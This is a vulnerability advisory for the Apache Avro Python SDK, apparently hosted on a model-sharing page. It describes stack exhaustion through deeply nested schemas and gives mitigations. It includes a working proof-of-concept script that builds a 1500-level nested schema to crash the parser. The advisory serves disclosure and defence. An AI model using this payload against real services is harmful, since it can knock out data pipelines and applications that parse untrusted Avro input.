Apache Avro: Denial of Service (DoS) via Recursive Schema Parsing

Summary

The Apache Avro Python SDK is vulnerable to a Denial of Service (DoS) attack. A maliciously crafted Avro schema (.avsc) or data file (.avro) containing a deeply nested schema can trigger a RecursionError (Stack Overflow) in the Python interpreter, causing the application to crash.

Vulnerability Details

  • Affected Component: avro.schema.parse and avro.io.DatumReader.
  • Root Cause: The function make_avsc_object in avro/schema.py uses a recursive approach to parse nested records and types. It lacks a depth limit or an iterative implementation, making it susceptible to stack exhaustion.
  • Attack Vector: An attacker can provide a schema with hundreds or thousands of nested records. When the application attempts to parse this schema (either directly or as part of reading an Avro data file), it will trigger a RecursionError.

Impact

  • Severity: Medium (DoS)
  • Effect: Application crash. This can be used to disrupt data processing pipelines, web services, or any application that consumes untrusted Avro data or schemas.

Proof of Concept (PoC)

The following Python script generates a malicious schema and demonstrates the crash:

import avro.schema
import json
import sys

# Malicious schema with 1500 nested records
schema_str = '{"type": "record", "name": "L0", "fields": [{"name": "f", "type": "int"}]}'
for i in range(1, 1500):
    schema_str = f'{{"type": "record", "name": "L{i}", "fields": [{{"name": "f", "type": {schema_str}}}]}}'

try:
    # This will trigger a RecursionError in the Avro parser
    avro.schema.parse(schema_str)
except RecursionError:
    print("VULNERABILITY CONFIRMED: RecursionError during schema parsing!")

Mitigation

  • Short-term: Implement a maximum recursion depth limit in avro.schema.parse.
  • Long-term: Refactor the schema parser to use an iterative approach instead of recursion.
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support